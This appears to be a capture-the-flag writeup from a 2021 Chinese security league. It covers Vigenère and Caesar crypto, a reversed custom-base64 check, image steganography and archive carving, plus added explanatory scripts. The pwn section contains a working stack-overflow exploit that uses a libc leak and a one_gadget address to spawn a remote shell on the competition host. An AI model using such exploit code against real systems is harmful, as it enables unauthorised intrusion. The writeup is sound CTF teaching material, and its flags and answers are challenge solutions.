Title: 2021 Spring and Autumn Cup Cyber Security League Autumn Stage writeup

Crypto

Vigenere

Brute-forcing the key on the https://www.boxentriq.com/code-breaking/vigenere-cipher website gives key: asterism

Decrypt with it to obtain the flag.

or

The challenge title, Vigenere, already tells us this is a Vigenère cipher.

Crack it with an online solver:

https://guballa.de/vigenere-solver

flag: flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648}
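The online solvers used above do nothing magical: because the key repeats, every ciphertext letter under the same key letter is a plain Caesar shift, so each column can be solved with English letter frequencies. The following is an added example, not code from the original writeup or from either website; the plaintext is constructed for the demonstration and the key "asterism" is the one the page recovered. It recovers the key length and the key from ciphertext alone, which goes slightly beyond the page (which only shows the solver's output).

```python
import string

ALPHA = string.ascii_uppercase

# Relative frequency of each letter in English text, A..Z, in percent (standard published table).
ENGLISH_FREQ = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966,
                0.153, 0.772, 4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987,
                6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074]


def vigenere(text, key, decrypt=False):
    """Vigenere encrypt (or decrypt) text; non-letters pass through and do not advance the key."""
    key = key.upper()
    out, k = [], 0
    for ch in text:
        if ch.isalpha():
            shift = ord(key[k % len(key)]) - 65
            if decrypt:
                shift = -shift
            base = 65 if ch.isupper() else 97
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return ''.join(out)


def chi_squared(letters):
    """Distance between the letter counts of an uppercase string and English; lower is more English-like."""
    n = len(letters)
    counts = [0] * 26
    for c in letters:
        counts[ord(c) - 65] += 1
    total = 0.0
    for i in range(26):
        expected = n * ENGLISH_FREQ[i] / 100.0
        total += (counts[i] - expected) ** 2 / expected
    return total


def recover_key(ciphertext, max_len=12):
    """Try every key length, solve each column as a Caesar shift, keep the most English-looking result."""
    letters = ''.join(c for c in ciphertext.upper() if c.isalpha())
    best_score, best_key = None, ''
    for length in range(1, max_len + 1):
        key = ''
        for i in range(length):
            column = letters[i::length]
            # the shift whose un-shifted column best matches English frequencies
            shift = min(range(26), key=lambda s: chi_squared(vigenere(column, ALPHA[s], decrypt=True)))
            key += ALPHA[shift]
        score = chi_squared(vigenere(letters, key, decrypt=True))
        if best_score is None or score < best_score:
            best_score, best_key = score, key
    # a multiple of the true length recovers the key repeated; collapse it to its shortest period
    for p in range(1, len(best_key) + 1):
        if len(best_key) % p == 0 and best_key == best_key[:p] * (len(best_key) // p):
            return best_key[:p].lower()


# Constructed sample plaintext (not from the challenge) and its encryption under the page's key.
PLAINTEXT = (
    "The Vigenere cipher was long believed to be unbreakable because a single ciphertext letter "
    "can stand for many different plaintext letters depending on its position. Charles Babbage "
    "and later Friedrich Kasiski showed that this protection is an illusion. Because the key "
    "repeats, every letter of the plaintext that falls under the same key letter is shifted by "
    "the same amount, so the ciphertext is really several Caesar ciphers interleaved with one "
    "another. If the length of the key can be found, the ciphertext can be split into that many "
    "columns, and each column can be attacked separately with nothing more than a table of "
    "English letter frequencies. The length itself can be estimated from repeated groups of "
    "letters, whose distances tend to be multiples of the key length, or from the index of "
    "coincidence, which is noticeably higher for a column that came from a single shift than "
    "for a column that mixes several shifts together. Once the shifts are recovered the whole "
    "key is known and the message can be read at once. This is the same reasoning that the "
    "online solvers use, only they try many key lengths and report the one whose decryption "
    "looks most like ordinary language. The lesson for modern designs is that any key which is "
    "short compared with the data it protects, and which is reused in a predictable pattern, "
    "leaks statistical structure that an attacker can exploit without ever guessing the key."
)
CIPHERTEXT = vigenere(PLAINTEXT, "asterism")

if __name__ == "__main__":
    print("recovered key:", recover_key(CIPHERTEXT))
    print(vigenere(CIPHERTEXT, recover_key(CIPHERTEXT), decrypt=True)[:60])
```

The whole-text chi-squared score picks the key length: a wrong length leaves some columns mis-shifted and scores badly, while a multiple of the right length merely recovers the key repeated, which the final loop collapses.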

PWN

supercall

A simple stack overflow. Use LibcSearcher to find the libc base address from the real address of _IO_2_1_stdin_ leaked by the challenge, then use one_gadget to get a shell.

```python
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    : exp.py
@Time    : 2021/11/27 13:393:07
@Author  : lexsd6
'''
from pwn import *
from libcfind import *

local_mote = 0
elf = './supercall'
e = ELF(elf)
#context.log_level = 'debug'
context.arch = e.arch
ip_port = ['123.57.207.81', 16985]
debug = lambda: gdb.attach(p) if local_mote == 1 else None
if local_mote == 1:
    p = process(elf)
else:
    p = remote(ip_port[0], ip_port[-1])

#0x000000000000026796 : pop rdi ; ret
stack_addr = int(p.recvuntil(',')[:-1], 16)
stdin_addr = int(p.recv(), 16)
log.info(hex(stack_addr))
log.info(hex(stdin_addr))
x = finder('_IO_2_1_stdin_', stdin_addr, num=9)
#[-] 9: local-46e93283ff531:e02a73ae5b5ba375410855 (source from:/mnt/d/filewsl/supercall/libc-2.27.so)
p.sendline('1' * 8 + '2' * 8 + '3' * 7)
p.sendline('\x00' * 0x10 + 'x' * 8 + p64(x.ogg(num=0)))
'''
[-] 0:0x4f3d5 execve('/bin/sh', rsp+0x40, environment)
constraints: rsp & 0xf == 0 rcx == NULL
'''
p.interactive()
```

Then cat the flag on the remote box.

```
[+] you choose gadget:0x4f3d5
[*] Switching to interact mode
$ ls
bin
dev
flag
lib
lib32
lib64
supercall
$ cat f*
flag{2f3f3632-6484-4c00-82f3-a63e0d4340d9}
$
```

RESnake

I found that the binary is UPX-packed. After unpacking it, I opened it in IDA to review and found a function that looks like the encrypted flag check.

```c
int sub_40186F()
{
  char v1[256];   // [esp+18h] [ebp-910h]
  char Dst[2048]; // [esp+118h] [ebp-810h]
  int j;          // [esp+918h] [ebp-10h]
  int i;          // [esp+91Ch] [ebp-Ch]

  sub_4021AD(22, 18);
  scanf("%s", v1);
  for ( i = 0; v1[i]; ++i )
    ;
  sub_4017D2(v1, i);          // fun2
  memset(Dst, 0, 0x800u);
  sub_4015F7(v1, Dst, i);     // fun1
  sub_4021AD(22, 20);
  for ( j = 0; Dst[j]; ++j )
  {
    if ( Dst[j] != a7g5d5bayTmdlwl[j] )
      return puts("Not right~ Come again next time~");
  }
  return puts(asc_405016);
}
```

Following fun2 further, we find:

```c
int __cdecl sub_4017D2(int a1, int a2)
{
  int result;   // eax
  int j;        // [esp+8h] [ebp-Ch]
  signed int i; // [esp+Ch] [ebp-8h]

  for ( i = 1; i <= 10; ++i )
  {
    for ( j = 0; ; ++j )
    {
      result = *(unsigned __int8 *)(j + a1);
      if ( !(_BYTE)result )
        break;
      if ( a2 % i )
        *(_BYTE *)(j + a1) ^= (_BYTE)i + (_BYTE)j;
      else
        *(_BYTE *)(j + a1) ^= (unsigned __int8)(j % i) + (_BYTE)j;
    }
  }
  return result;
}
```

It takes our input string and XORs each character with a value that depends on its position (and on the input length).

fun1 is a base64 encoding of the string.

```c
while ( v16 < a3 )
{
  v3 = v13;
  v14 = v13 + 1;
  *(_BYTE *)(a2 + v3) = Str[((signed int)*(unsigned __int8 *)(v16 + a1) >> 2) & 0x3F];
  v11 = 16 * *(_BYTE *)(v16 + a1) & 0x30;
  if ( v16 + 1 == a3 )
  {
    v4 = v14;
    v5 = v14 + 1;
    *(_BYTE *)(a2 + v4) = Str[v11];
    *(_BYTE *)(v5 + a2) = '=';
    v6 = v5 + 1;
    v13 = v5 + 2;
    *(_BYTE *)(v6 + a2) = '=';
    break;
  }
  v7 = v14;
  v15 = v14 + 1;
  *(_BYTE *)(a2 + v7) = Str[((signed int)*(unsigned __int8 *)(v16 + 1 + a1) >> 4) & 0xF | v11];
  v12 = 4 * *(_BYTE *)(v16 + 1 + a1) & 0x3C;
  if ( v16 + 2 == a3 )
  {
    *(_BYTE *)(a2 + v15) = Str[v12];
    v8 = v15 + 1;
    v13 = v15 + 2;
    *(_BYTE *)(v8 + a2) = '=';
    break;
  }
  *(_BYTE *)(a2 + v15) = Str[((signed int)*(unsigned __int8 *)(v16 + 2 + a1) >> 6) & 3 | v12];
  v9 = v15 + 1;
  v13 = v15 + 2;
  *(_BYTE *)(a2 + v9) = Str[*(_BYTE *)(v16 + 2 + a1) & 0x3F];
  v16 += 3;
}
```

However, during debugging I found that, before fun1 runs, another function changes the value of the global variable Str (the base64 alphabet).

This function is as follows:

```c
signed int sub_401536()
{
  char v0;           // ST13_1
  signed int result; // eax
  signed int v2;     // [esp+14h] [ebp-14h]
  int j;             // [esp+18h] [ebp-10h]
  int i;             // [esp+1Ch] [ebp-Ch]

  v2 = strlen("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
  for ( i = 0; v2 / 2 > i; ++i )
  {
    for ( j = 0; v2 - i - 1 > j; ++j )
    {
      if ( Str[j] > Str[j + 1] )
      {
        v0 = Str[j];
        Str[j] = Str[j + 1];
        Str[j + 1] = v0;
      }
    }
  }
  result = 1;
  dword_406060 = 1;
  return result;
}
```

So I wrote a script to reproduce what it does:

```python
base_flag = []
#x = '7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'
x = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
v2 = len('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')
'''
for ( i = 0; v2 / 2 > i; ++i )
{
  for ( j = 0; v2 - i - 1 > j; ++j )
  {
    if ( Str[j] > Str[j + 1] )
    {
      v0 = Str[j];
      Str[j] = Str[j + 1];
      Str[j + 1] = v0;
    }
  }
}
'''
for i in x:
    base_flag.append(ord(i))
print(base_flag)
# replay the v2/2 = 32 bubble-sort passes the binary runs over Str (not a full sort)
for i in range(v2 // 2):
    for j in range(v2 - i - 1):
        if base_flag[j] > base_flag[j + 1]:
            v0 = base_flag[j]
            base_flag[j] = base_flag[j + 1]
            base_flag[j + 1] = v0
print(''.join(chr(c) for c in base_flag))
```

This gives the real Str: ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz

Reversing fun1 and fun2 from their decompiled source gives the flag:

```python
import base64

table = 'ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz'
table2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
tmp = '7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'
tmp2 = ''
# map each character of the sorted table back to the standard base64 alphabet
for i in tmp:
    index = table.index(i)
    tmp2 += table2[index]
k = base64.b64decode(tmp2 + '==')
kk = list(bytearray(k))  # byte values; works on both Python 2 and 3
print(kk)
a2 = len(kk)
# undo fun2: the XOR masks are self-inverse, so replaying the same loops restores the input
for i in range(1, 11):
    for j in range(len(kk)):
        print(str(a2 % i) + '' + str(i))
        if a2 % i != 0:
            kk[j] ^= (i + j)
        else:
            kk[j] ^= ((j % i) + j)
    print(kk)
#print(k)
print(kk)
flag = ''
for i in kk:
    flag += chr(i)
print(flag)
```

Output the flag:

flag{5e2200bc-f21a-5421-a90b-57dec19fe196}
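To tie the three pieces together (the partial bubble sort of sub_401536, the position-dependent XOR of fun2, and the custom-alphabet base64 of fun1), here is an added example, written for this page and not part of the original writeup, that implements both the binary's forward check and its inverse in one place. Function names (build_table, scramble, custom_b64encode, solve) are my own; the target string and the flag are the ones the page reports.

```python
import base64

STD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'


def build_table():
    """Replay sub_401536: 32 bubble-sort passes over the standard alphabet (deliberately not a full sort)."""
    chars = list(STD_ALPHABET)
    n = len(chars)
    for i in range(n // 2):
        for j in range(n - i - 1):
            if chars[j] > chars[j + 1]:
                chars[j], chars[j + 1] = chars[j + 1], chars[j]
    return ''.join(chars)


def scramble(data):
    """fun2 (sub_4017D2): XOR each byte with a mask from (pass, position, length). Self-inverse."""
    buf = bytearray(data)
    n = len(buf)
    for i in range(1, 11):
        for j in range(n):
            if n % i:
                buf[j] ^= (i + j) & 0xFF
            else:
                buf[j] ^= ((j % i) + j) & 0xFF
    return bytes(buf)


def custom_b64encode(data, table):
    """fun1 (sub_4015F7): ordinary base64 bit packing, but indexed into the mutated table."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        b0 = chunk[0]
        out.append(table[b0 >> 2])
        if len(chunk) == 1:
            out.append(table[(b0 & 3) << 4])
            out.append('==')
            break
        b1 = chunk[1]
        out.append(table[((b0 & 3) << 4) | (b1 >> 4)])
        if len(chunk) == 2:
            out.append(table[(b1 & 0xF) << 2])
            out.append('=')
            break
        b2 = chunk[2]
        out.append(table[((b1 & 0xF) << 2) | (b2 >> 6)])
        out.append(table[b2 & 0x3F])
    return ''.join(out)


def custom_b64decode(text, table):
    """Translate the custom alphabet back to the standard one, then let the stdlib decode it."""
    translated = ''.join('=' if c == '=' else STD_ALPHABET[table.index(c)] for c in text)
    return base64.b64decode(translated)


def check_input(user_input, expected, table=None):
    """What the binary does: scramble, encode with the mutated table, compare with the constant."""
    table = table or build_table()
    return custom_b64encode(scramble(user_input.encode()), table) == expected


def solve(expected, table=None):
    """The inverse: decode with the mutated table, then undo the XOR layer."""
    table = table or build_table()
    return scramble(custom_b64decode(expected, table)).decode()


TARGET = '7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'  # a7g5d5bayTmdlwl in the binary

if __name__ == '__main__':
    print(build_table())
    print(solve(TARGET))
```

Having the forward direction as well as the inverse is what lets you confirm a recovered flag actually satisfies the binary's check before submitting it.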

MISC

Questions

After filling in the form, the flag is given:

flag{Let us bring a sense of security to the world together}

helloshark

We are given a picture. Opening it in 010 Editor shows many PK markers in the hex dump, so the image is carved with foremost. Sure enough, a compressed archive is hidden inside, but it is password-protected, and the prompt says the password is in the picture. Guessing that the picture carries LSB steganography, I check it with zsteg, which reveals the password @91902AF23C#276C2FC7EAC615739CC7C0. Decompress the archive, open the packet capture, and follow the TCP stream.

Splicing the pieces together gives the flag: flag{a4e0a418-fced-4b2d-9d76-fdc9053d69a1}
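The "PK" markers spotted in 010 Editor are ZIP signatures, and carving the archive out by hand is what foremost automates. The following is an added example (my code, not the writeup's and not foremost): it locates a ZIP appended to an image by its local-file-header and end-of-central-directory signatures, slices it out, and reports the members and whether they are password-protected (general-purpose flag bit 0) without extracting anything. The sample blob is constructed in-line and is not the challenge file.

```python
import io
import struct
import zipfile

LOCAL_FILE_HEADER = b"PK\x03\x04"   # start of a ZIP member
END_OF_CENTRAL_DIR = b"PK\x05\x06"  # end-of-central-directory record


def find_embedded_zip(blob):
    """Return (offset, zip_bytes) for a ZIP archive hidden in blob, or None if there is none."""
    start = blob.find(LOCAL_FILE_HEADER)
    if start < 0:
        return None
    end = blob.rfind(END_OF_CENTRAL_DIR, start)
    if end < 0 or end + 22 > len(blob):
        return None
    # the EOCD record is 22 bytes plus an optional comment whose length sits at offset 20
    comment_len = struct.unpack_from("<H", blob, end + 20)[0]
    return start, blob[start:end + 22 + comment_len]


def describe_zip(zip_bytes):
    """Member names and whether each is encrypted (general-purpose flag bit 0), without extracting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(info.filename, bool(info.flag_bits & 0x1)) for info in zf.infolist()]


def make_sample():
    """Constructed sample: a fake PNG-like header followed by a small archive, like the challenge file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("hint.txt", "the password is in the picture")
        zf.writestr("capture.pcapng", b"\x0a\x0d\x0d\x0a" + b"\x00" * 28)
    fake_png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    return fake_png + buf.getvalue()


if __name__ == "__main__":
    blob = make_sample()
    offset, archive = find_embedded_zip(blob)
    print("archive at offset", offset)
    for name, encrypted in describe_zip(archive):
        print(name, "(encrypted)" if encrypted else "")
```

Reading the flag bits up front tells you whether you need a password before you try to extract, which is exactly the situation in this challenge.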

secret_chart

Another picture, handled the same way: open it in 010 Editor, carve it, and get an encrypted archive. The password comes with no hint, so try brute-forcing it; it succeeds with password 9527. Unzip it and open the Excel file. The table is made up of 6 months; the left and bottom edges are all 1, so guess that it is a QR code. First put the 6 months of data together and unify the row height and column width. Then add a conditional format: when a cell contains 1, fill the background with black. WeChat cannot scan it, so screenshot the QR code. The DataMatrix online decoder http://boy.co.ua/decode.php decodes it to a flag-like string zfua{B3s1o9in1Nw0halUnofuNc0HM1}. Caesar cipher decryption gives the flag: flag{H3y1u9ot1Tc0ngrAtulaTi0NS1}
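The last step is a Caesar shift, and the known prefix flag{ is enough to pin the shift down without guessing. Here is an added example (mine, not from the writeup) that tries all 26 shifts and keeps the one producing the crib; digits, braces and punctuation are left untouched, which is why the 3, 1, 9 and 0 in the string survive.

```python
def caesar(text, shift):
    """Shift letters by `shift` positions, preserving case; digits and punctuation pass through."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return ''.join(out)


def recover_shift(ciphertext, crib="flag{"):
    """Return the shift that makes the text start with the crib, or None if no shift does."""
    for shift in range(26):
        if caesar(ciphertext, shift).startswith(crib):
            return shift
    return None


def solve(ciphertext, crib="flag{"):
    """Decrypt a Caesar-shifted flag using the crib to choose the shift."""
    shift = recover_shift(ciphertext, crib)
    return None if shift is None else caesar(ciphertext, shift)


if __name__ == "__main__":
    # the string the DataMatrix decoder produced (from the writeup)
    print(recover_shift("zfua{B3s1o9in1Nw0halUnofuNc0HM1}"))
    print(solve("zfua{B3s1o9in1Nw0halUnofuNc0HM1}"))
```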

Source: https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/#Crypto
